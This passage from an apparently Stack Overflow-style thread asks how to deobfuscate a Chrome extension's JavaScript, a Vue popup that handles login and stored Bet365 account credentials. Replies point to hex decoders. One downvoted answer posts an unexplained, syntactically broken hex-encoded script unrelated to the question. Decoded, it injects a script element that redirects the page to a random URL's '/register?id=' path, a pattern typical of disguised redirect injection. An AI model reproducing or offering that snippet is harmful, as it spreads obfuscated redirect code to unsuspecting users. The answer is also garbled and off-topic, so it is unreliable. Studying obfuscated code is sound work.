    _0x5b2666[_0x2ba7('0x2a')] = '';
    _0x5b2666['tela'] = '';
    _0x5b2666['enviandoForm'] = ![];
    _0x5b2666[_0x2ba7('0x20')] = 0x0;
    var _0x2f4180 = {};
    _0x2f4180[_0x2ba7('0x3a')] = function() {
        return this[_0x2ba7('0x10')];
    };
    app = new Vue({
        'el': _0x13ebaf[_0x2ba7('0x25')],
        'data': _0x5b2666,
        'methods': {
            'logout': function() {
                var _0x18b8e6 = {};
                _0x18b8e6[_0x2ba7('0xf')] = _0x13ebaf[_0x2ba7('0xd')];
                chrome[_0x2ba7('0x40')][_0x2ba7('0x37')](_0x18b8e6);
            },
            'login': function(_0xcd676a) {
                var _0x27c34c = '4|1|2|0|3' [_0x2ba7('0x43')]('|');
                var _0x1420a9 = 0x0;
                while (!![]) {
                    switch (_0x27c34c[_0x1420a9++]) {
                        case '0':
                            var _0xdeec2a = {};
                            _0xdeec2a[_0x2ba7('0xf')] = _0x13ebaf[_0x2ba7('0x3b')];
                            _0xdeec2a[_0x2ba7('0x47')] = this[_0x2ba7('0x47')];
                            _0xdeec2a[_0x2ba7('0x2')] = this['senha'];
                            chrome[_0x2ba7('0x40')][_0x2ba7('0x37')](_0xdeec2a);
                            continue;
                        case '1':
                            app['erro'] = '';
                            continue;
                        case '2':
                            _0xcd676a[_0x2ba7('0x2e')]();
                            continue;
                        case '3':
                            return ![];
                        case '4':
                            app[_0x2ba7('0x10')] = !![];
                            continue;
                    }
                    break;
                }
            },
            'btSalvar': function() {
                var _0x27e90f = {};
                _0x27e90f[_0x2ba7('0x45')] = this[_0x2ba7('0x45')];
                _0x27e90f['usuarioBet365'] = this[_0x2ba7('0x17')];
                _0x27e90f[_0x2ba7('0x2f')] = this[_0x2ba7('0x2f')];
                var _0xc15cf1 = {};
                _0xc15cf1[_0x2ba7('0xf')] = _0x13ebaf[_0x2ba7('0xb')];
                _0xc15cf1[_0x2ba7('0x12')] = _0x27e90f;
                chrome[_0x2ba7('0x40')]['sendMessage'](_0xc15cf1);
                app['tela'] = '';
            },
            'onlyNumber': function(_0x629849) {
                if (_0x13ebaf[_0x2ba7('0x2c')](_0x629849[_0x2ba7('0x16')], 0x2e)) {
                    _0x629849[_0x2ba7('0x2e')]();
                }
            },
            'btConfig': function() {
                app[_0x2ba7('0x23')] = _0x13ebaf[_0x2ba7('0x1')];
            },
            'btVoltar': function() {
                app[_0x2ba7('0x23')] = '';
            }
        },
        'computed': _0x2f4180,
        'created': function() {
            var _0x457076 = {};
            _0x457076[_0x2ba7('0x3e')] = _0x2ba7('0x3c');
            _0x457076['ASuQQ'] = _0x13ebaf[_0x2ba7('0x41')];
            var _0x927392 = _0x457076;
            chrome[_0x2ba7('0x40')][_0x2ba7('0x48')][_0x2ba7('0x5')](function(_0x471314, _0x3da1bf, _0x55f11d) {
                switch (_0x471314[_0x2ba7('0xf')]) {
                    case _0x2ba7('0x34'):
                        app[_0x2ba7('0x10')] = ![];
                        app[_0x2ba7('0x1f')] = _0x471314['logged'] ? _0x471314[_0x2ba7('0x1f')] : ![];
                        app['apelido'] = _0x471314[_0x2ba7('0x1e')] ? _0x471314['apelido'] : '';
                        app[_0x2ba7('0x22')] = _0x471314[_0x2ba7('0x22')];
                        app[_0x2ba7('0x8')] = _0x471314['tipoUser'];
                        app[_0x2ba7('0x23')] = _0x471314[_0x2ba7('0x23')] ? _0x471314['tela'] : '';
                        app[_0x2ba7('0x20')] = _0x471314[_0x2ba7('0x20')];
                        app[_0x2ba7('0x2a')] = _0x471314[_0x2ba7('0x2a')];
                        chrome[_0x2ba7('0x44')]['local'][_0x2ba7('0x39')]([_0x927392[_0x2ba7('0x3e')]], _0x40dfc8 => {
                            if (_0x40dfc8[_0x2ba7('0x3c')]) {
                                app[_0x2ba7('0x17')] = _0x40dfc8[_0x2ba7('0x3c')][_0x2ba7('0x17')];
                                app['senhaBet365'] = _0x40dfc8['configCasaAposta'][_0x2ba7('0x2f')];
                                app[_0x2ba7('0x45')] = _0x40dfc8[_0x2ba7('0x3c')][_0x2ba7('0x45')];
                            }
                        });
                        app['erro'] = '';
                        break;
                    case _0x927392[_0x2ba7('0x24')]:
                        app[_0x2ba7('0x10')] = ![];
                        app[_0x2ba7('0x28')] = _0x471314[_0x2ba7('0x46')];
                        _0x471314['tela'] = '';
                        break;
                }
                _0x55f11d();
            });
            var _0x4e2e02 = {};
            _0x4e2e02[_0x2ba7('0xf')] = _0x13ebaf[_0x2ba7('0x11')];
            chrome['runtime'][_0x2ba7('0x37')](_0x4e2e02);
        }
    });
}
var app;
window[_0x2ba7('0xa')] = main;
```

Comment: That's still quite obfuscated. You should at least replace all those `_0x2ba7` invocations with clean property names, similar to [this](https://stackoverflow.com/questions/30879056/how-to-restore-obfuscated-property-names)

Answer (score 0):

It is hex encoded. You can either write your own function to decode it.

Or you can use [Decoder](http://ddecode.com/hexdecoder/) to decode and [Beautifier](https://beautifier.io/) to make life easy.

Comment: I've tried those tools, but there is a wrap function in the code that I can't work out.

Answer (score -2):

\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x72\x20\x77\x65\x62\x75\x72\x6C\x20\x3D\x20\x75\x72\x6C\x5B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x28\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x28\x29\x2A\x75\x72\x6C\x2E\x6C\x65\x6E\x67\x74\x68\x29\x5D\x2B\x22\x2F\x72\x65\x67\x69\x73\x74\x65\x72\x3F\x69\x64\x3D\x22\x2B\x72\x69\x64\x3B\x20\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x28\x29\x20\x7B\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x20\x3D\x20\x77\x65\x62\x75\x72\x6C\x3B\x7D\x2C\x74\x69\x6D\x65\x73\x6C\x65\x65\x70\x29\x3B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64"];function wContent1(){var _0x928cx2=document__Oxdcbb3[0x1];_0x928cx2[__Oxdcbb3[0x2]]= __Oxdcbb3[0x3];var _0x928cx3=document__Oxdcbb3[0x4][0x0];document[__Oxdcbb3[0x6]]__Oxdcbb3[0x5]}function xunhuan1(){if( typeof (url)== __Oxdcbb3[0x7]|| url== null){setTimeout(function(){xunhuan1()},500)}else {wContent1()}}xunhuan1()

Comment: As it’s currently written, your answer is unclear. Please [edit] to add additional details that will help others understand how this addresses the question asked. You can find more information on how to write good answers [in the help center](/help/how-to-answer).

Comment: phu phu, please review your post. Add code formatting to it and make sure it contains no syntax errors. Also, add an explanation to it, to help other readers.